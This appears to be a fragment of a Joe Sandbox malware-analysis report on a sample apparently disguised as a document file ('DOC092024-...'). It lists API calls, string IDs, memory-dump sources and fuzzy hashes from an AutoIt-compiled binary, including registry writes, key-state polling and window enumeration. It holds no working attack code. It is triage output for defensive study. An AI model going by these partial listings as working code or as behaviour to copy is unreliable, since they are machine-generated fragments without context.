                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0072A8F9
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0072A90D
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0072A92B
                                                        • GetStockObject.GDI32(00000011), ref: 0072A947
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0072A952
                                                          • Part of subcall function 0072B736: GetCursorPos.USER32(000000FF), ref: 0072B749
                                                          • Part of subcall function 0072B736: ScreenToClient.USER32(00000000,000000FF), ref: 0072B766
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000001), ref: 0072B78B
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000002), ref: 0072B799
                                                        • SetTimer.USER32(00000000,00000000,00000028,0072ACEE), ref: 0072A979
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 64899ea08c1236c56f0ec6f0200ab39f4b3e04b58e348cd127619891624533e9
                                                        • Instruction ID: 47f7635dad0bc453ff16f5073a41b30dee0ac8e5f0944c7a02da63cc21dffcf6
                                                        • Opcode Fuzzy Hash: 64899ea08c1236c56f0ec6f0200ab39f4b3e04b58e348cd127619891624533e9
                                                        • Instruction Fuzzy Hash: E2B19E71A0021AEFDB10DFA8DC45BAD7BB4FB08314F11822AFA15A7290DB78E841DB55
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00773626
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,007ADBF0,00000000,?,00000000,?,?), ref: 00773694
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007736DC
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00773765
                                                        • RegCloseKey.ADVAPI32(?), ref: 00773A85
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00773A92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: abb612274eeee1d799bd70febf5e85c55de8ecc075917330e71ee835c1420955
                                                        • Instruction ID: 29afd7932c7dc516aac266ad0c8e2417aad50cacdbd3ddc8560665c9d1aa12d4
                                                        • Opcode Fuzzy Hash: abb612274eeee1d799bd70febf5e85c55de8ecc075917330e71ee835c1420955
                                                        • Instruction Fuzzy Hash: 54023A75200611DFCB14EF28C895E6AB7E5FF89720F05845DF88A9B2A2DB38ED41CB41
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00776A52
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00776B12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 3974292440-719923060
                                                        • Opcode ID: b5b11ac70a451a2d5f078b4df5be44c7cf90631986b79e983e502e4ab91a44f5
                                                        • Instruction ID: c23739e928b0363eadf7676ac6e47e2a794f29dfc45ffc6d63162c2d26b4c047
                                                        • Opcode Fuzzy Hash: b5b11ac70a451a2d5f078b4df5be44c7cf90631986b79e983e502e4ab91a44f5
                                                        • Instruction Fuzzy Hash: ABA19170204601DBCB18EF24C855BAAB3A6EF85354F14C86DF89A9B3D6DB38ED05CB51
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0074DD87
                                                        • __swprintf.LIBCMT ref: 0074DE28
                                                        • _wcscmp.LIBCMT ref: 0074DE3B
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0074DE90
                                                        • _wcscmp.LIBCMT ref: 0074DECC
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0074DF03
                                                        • GetDlgCtrlID.USER32(?), ref: 0074DF55
                                                        • GetWindowRect.USER32(?,?), ref: 0074DF8B
                                                        • GetParent.USER32(?), ref: 0074DFA9
                                                        • ScreenToClient.USER32(00000000), ref: 0074DFB0
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0074E02A
                                                        • _wcscmp.LIBCMT ref: 0074E03E
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0074E064
                                                        • _wcscmp.LIBCMT ref: 0074E078
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                        • String ID: %s%u
                                                        • API String ID: 3119225716-679674701
                                                        • Opcode ID: d44f65367d22ddb1694c654f953bb1ea21f9a00f6ec14349e571ab3b649dc849
                                                        • Instruction ID: da1038f4a08e17d0040b37681c41233bc06ba4003951323f5b7a9b8f372e5ee9
                                                        • Opcode Fuzzy Hash: d44f65367d22ddb1694c654f953bb1ea21f9a00f6ec14349e571ab3b649dc849
                                                        • Instruction Fuzzy Hash: 4BA1CF71604706EFD724DF64C888FAAB7A8FF44350F10852AF9A9C2191DB78ED46CB91
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0074E6E1
                                                        • _wcscmp.LIBCMT ref: 0074E6F2
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0074E71A
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0074E737
                                                        • _wcscmp.LIBCMT ref: 0074E755
                                                        • _wcsstr.LIBCMT ref: 0074E766
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0074E79E
                                                        • _wcscmp.LIBCMT ref: 0074E7AE
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0074E7D5
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0074E81E
                                                        • _wcscmp.LIBCMT ref: 0074E82E
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0074E856
                                                        • GetWindowRect.USER32(00000004,?), ref: 0074E8BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 9fa614c54a3a75f03df79f61366ec61a4666c81003a373a521a166d46d21c9dd
                                                        • Instruction ID: 9696aad5ed0b233d50dda1482e13010e79d704df5fce13c17db654197da629eb
                                                        • Instruction Fuzzy Hash: 8F81AE31008205DBDB15CF54C885FAA7BE8FF54764F04846AFD899A096DB38ED46CBA2
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: e311a80b2291e25c6da34bd230dd8893707ad899043b0b022a370ca947e24ee0
                                                        • Instruction ID: 75c80d4f72e9d63ebd89161b4b804e4ac3f53a6125ce694eaba04de07d57cc9c
                                                        • Instruction Fuzzy Hash: 7931A971A48205E6DB28EA64CD57FEEB3A46B10B24F60042CF451B10D3FF9DAF15C662
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 0074F8AB
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0074F8BD
                                                        • SetWindowTextW.USER32(?,?), ref: 0074F8D4
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0074F8E9
                                                        • SetWindowTextW.USER32(00000000,?), ref: 0074F8EF
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0074F8FF
                                                        • SetWindowTextW.USER32(00000000,?), ref: 0074F905
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0074F926
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0074F940
                                                        • GetWindowRect.USER32(?,?), ref: 0074F949
                                                        • SetWindowTextW.USER32(?,?), ref: 0074F9B4
                                                        • GetDesktopWindow.USER32 ref: 0074F9BA
                                                        • GetWindowRect.USER32(00000000), ref: 0074F9C1
                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0074FA0D
                                                        • GetClientRect.USER32(?,?), ref: 0074FA1A
                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0074FA3F
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0074FA6A
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: d9c4573863eb6aa7d967c08ad2cf49dd5137dc0399861b8f864ded75a4e9101a
                                                        • Instruction ID: 7f30589ed4a28b47add46dbf40838d471722b14e6858bc564f8796c714f46b62
                                                        • Instruction Fuzzy Hash: 6F513A71900709EFDB209FA8CD89F6EBBF5FF04744F004929E696A65A0C778AD45CB14
                                                        APIs
                                                        • _memset.LIBCMT ref: 0077CD0B
                                                        • DestroyWindow.USER32(?,?), ref: 0077CD83
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0077CE04
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0077CE26
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0077CE35
                                                        • DestroyWindow.USER32(?), ref: 0077CE52
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00710000,00000000), ref: 0077CE85
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0077CEA4
                                                        • GetDesktopWindow.USER32 ref: 0077CEB9
                                                        • GetWindowRect.USER32(00000000), ref: 0077CEC0
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0077CED2
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0077CEEA
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: 3f46dd5163f33ee913140df635c31208a947ea0699578ffa8d6b985c54a4e655
                                                        • Instruction ID: b2820eb72a72b05060e577e8c0318c99066c6e06e786a7ec86eddc0db42cfbbe
                                                        • Instruction Fuzzy Hash: 08719C71140309AFDB25CF28CC45FAA3BF9EB88744F84851DF989972A1D778E802DB15
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 0075B46D
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0075B476
                                                        • VariantClear.OLEAUT32(?), ref: 0075B482
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0075B561
                                                        • __swprintf.LIBCMT ref: 0075B591
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0075B5BD
                                                        • VariantInit.OLEAUT32(?), ref: 0075B63F
                                                        • SysFreeString.OLEAUT32(00000016), ref: 0075B6D1
                                                        • VariantClear.OLEAUT32(?), ref: 0075B727
                                                        • VariantClear.OLEAUT32(?), ref: 0075B736
                                                        • VariantInit.OLEAUT32(00000000), ref: 0075B772
                                                        Strings
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 3730832054-3931177956
                                                        • Opcode ID: e44555719d3a7d0718ef5dbc31950902124376c6a99e4188301190f03edd3f70
                                                        • Instruction ID: c6b2323d9f9aaba68753d79bd0b40d551a6a17e75cb8356cbe79607443349f49
                                                        • Instruction Fuzzy Hash: C6C1F171A00615EBCB20DF65D488BB9B7B4FF45702F248466EC059B192DBBCEC48DBA1
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00776FF9
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00777044
                                                        Strings
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: ec5d3f66ae5dc976eb6acf826ed0b0fac7e3b301c6e66bfe665fda58b8e35685
                                                        • Instruction ID: b70037d4d0f34fd6232b13ed0113037ddef3f1ca9779498ee1a39508c7d22131
                                                        • Instruction Fuzzy Hash: DE917434204711DFCB18EF14C855A69B7E2AF94390F04886DF8965B393DB39ED46CB82
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0077E3BB
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00779615,?), ref: 0077E417
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0077E457
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0077E49C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0077E4D3
                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00779615,?), ref: 0077E4DF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0077E4EF
                                                        • DestroyCursor.USER32(?), ref: 0077E4FE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0077E51B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0077E527
                                                          • Part of subcall function 00731BC7: __wcsicmp_l.LIBCMT ref: 00731C50
                                                        Strings
                                                        Similarity
                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 3907162815-1154884017
                                                        • Opcode ID: d8bbf49c7c4960a5f31b0abf5f053a35b3a2f4262dc86c4f8a29f9bb85948fee
                                                        • Instruction ID: 2ae9fd752b187db350bde355b4d25a18044b5fa4c56aa0c42259d0a9bf4ea2af
                                                        • Instruction Fuzzy Hash: 7761BEB1500214FAEF24DF64CC45FEE77A8AB08760F108156F919E71D1DB789E90C7A0
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00760EFF
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00760F0F
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00760F1B
                                                        • __wsplitpath.LIBCMT ref: 00760F79
                                                        • _wcscat.LIBCMT ref: 00760F91
                                                        • _wcscat.LIBCMT ref: 00760FA3
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00760FB8
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760FCC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760FFE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076101F
                                                        • _wcscpy.LIBCMT ref: 0076102B
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0076106A
                                                        Strings
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 8369485d6bdb2a10a39c75577983d37a31f3b3e7563fb39c668a42658badccc3
                                                        • Instruction ID: 8ed895d9ca4becf0d37596a985d29a38338a90bb2532cc158c31578e77983b8d
                                                        • Instruction Fuzzy Hash: 23614071504345EFD710EF64C848A9BB3E8FF89310F04891EF99697251EB39EA45CB92
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • CharLowerBuffW.USER32(?,?), ref: 0075DB26
                                                        • GetDriveTypeW.KERNEL32 ref: 0075DB73
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075DBBB
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075DBF2
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075DC20
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        Strings
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 12b3a282e6ac8413e303d8d7dcae3fe70087f526ea5fd0403ed1d8467f1bbf09
                                                        • Instruction ID: 748c977dc442c05933ec47f1f230efa6fa6895107abd4742eae746de0b8b8621
                                                        • Opcode Fuzzy Hash: 12b3a282e6ac8413e303d8d7dcae3fe70087f526ea5fd0403ed1d8467f1bbf09
                                                        • Instruction Fuzzy Hash: 76514AB1104305EFC714EF14C9859AAB7F5EF88718F00886DF896972A1DB79EE09CB91
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00784085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00753145
                                                        • LoadStringW.USER32(00000000,?,00784085,00000016), ref: 0075314E
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00784085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00753170
                                                        • LoadStringW.USER32(00000000,?,00784085,00000016), ref: 00753173
                                                        • __swprintf.LIBCMT ref: 007531B3
                                                        • __swprintf.LIBCMT ref: 007531C5
                                                        • _wprintf.LIBCMT ref: 0075326C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00753283
                                                        Strings
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: d2f877f7f509754fd786bcd46a32992e3d00c74db2d36dc9fd992697061b4bb2
                                                        • Instruction ID: 9d506c93cfb0b5b3d8f7eb8b902367f37639d1cf36db8a611729980096c5e900
                                                        • Opcode Fuzzy Hash: d2f877f7f509754fd786bcd46a32992e3d00c74db2d36dc9fd992697061b4bb2
                                                        • Instruction Fuzzy Hash: 70416472904209FACB14FBD4DD5BEDE7778AF54741F504065B601B20E2DA7D6F48CAA0
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0075D96C
                                                        • __swprintf.LIBCMT ref: 0075D98E
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0075D9CB
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0075D9F0
                                                        • _memset.LIBCMT ref: 0075DA0F
                                                        • _wcsncpy.LIBCMT ref: 0075DA4B
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0075DA80
                                                        • CloseHandle.KERNEL32(00000000), ref: 0075DA8B
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0075DA94
                                                        • CloseHandle.KERNEL32(00000000), ref: 0075DA9E
                                                        Strings
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: 38ab1ac80523fb5729dbcd5272617842385733d872c46df523bf2094585a179d
                                                        • Instruction ID: 25a983b101a5c8530507d8f7c0f055a681959c22652ff5fe8ad366c0cab64b5a
                                                        • Opcode Fuzzy Hash: 38ab1ac80523fb5729dbcd5272617842385733d872c46df523bf2094585a179d
                                                        • Instruction Fuzzy Hash: BD318172600208AADB30DFA4DC49FDA77BDFF84701F10C1A6F919D2061EB789E458BA5
                                                        APIs
                                                        Similarity
                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                        • String ID:
                                                        • API String ID: 884005220-0
                                                        • Opcode ID: cd9eb3fdc2dbd16a0b713db5c7f449f19b2602d6b5823c8b48a263b0f28d5671
                                                        • Instruction ID: 6406a08e72e5de8cae82ede8ac2a0c4577d5352f4ca881fbd4cba696541e03e8
                                                        • Opcode Fuzzy Hash: cd9eb3fdc2dbd16a0b713db5c7f449f19b2602d6b5823c8b48a263b0f28d5671
                                                        • Instruction Fuzzy Hash: 2761F272901315EFEB259F38D846BAF77A4EF01320F214126EA419B192DB7DDC41CBA6
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0077E564
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0077E57B
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0077E586
                                                        • CloseHandle.KERNEL32(00000000), ref: 0077E593
                                                        • GlobalLock.KERNEL32(00000000), ref: 0077E59C
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0077E5AB
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0077E5B4
                                                        • CloseHandle.KERNEL32(00000000), ref: 0077E5BB
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0077E5CC
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0079D9BC,?), ref: 0077E5E5
                                                        • GlobalFree.KERNEL32(00000000), ref: 0077E5F5
                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0077E619
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0077E644
                                                        • DeleteObject.GDI32(00000000), ref: 0077E66C
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0077E682
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: b5eb2d085e40aed3992f54ef6e3c6661479d80a111b29a81d7cd173c3e4c5624
                                                        • Instruction ID: f6a90b743f7c09eb8110e065163dd6e9dd903c14a9969d39e2ebf1f4bcd019e9
                                                        • Opcode Fuzzy Hash: b5eb2d085e40aed3992f54ef6e3c6661479d80a111b29a81d7cd173c3e4c5624
                                                        • Instruction Fuzzy Hash: ED414A75600208EFDB219F64DC48EAABBB9FF89755F108099F909D7260D7399D01DB24
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 00760C93
                                                        • _wcscat.LIBCMT ref: 00760CAB
                                                        • _wcscat.LIBCMT ref: 00760CBD
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00760CD2
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760CE6
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00760CFE
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00760D18
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760D2A
                                                        Strings
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: 24f52f8cdebece8e53b662b4d2ab0e6fc8683fcbccab8be1fdf0f5b8429827d5
                                                        • Instruction ID: 084ef599de29455c909e2677c6182984da202b97844e24d2a66ccbfe3b53d6f8
                                                        • Opcode Fuzzy Hash: 24f52f8cdebece8e53b662b4d2ab0e6fc8683fcbccab8be1fdf0f5b8429827d5
                                                        • Instruction Fuzzy Hash: 378177715043059FC764DF64C8449AB77E4BB88314F14896AFC86C7251E738DD85CBE2
                                                        APIs
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0074B903
                                                          • Part of subcall function 0074B8E7: GetLastError.KERNEL32(?,0074B3CB,?,?,?), ref: 0074B90D
                                                          • Part of subcall function 0074B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0074B3CB,?,?,?), ref: 0074B91C
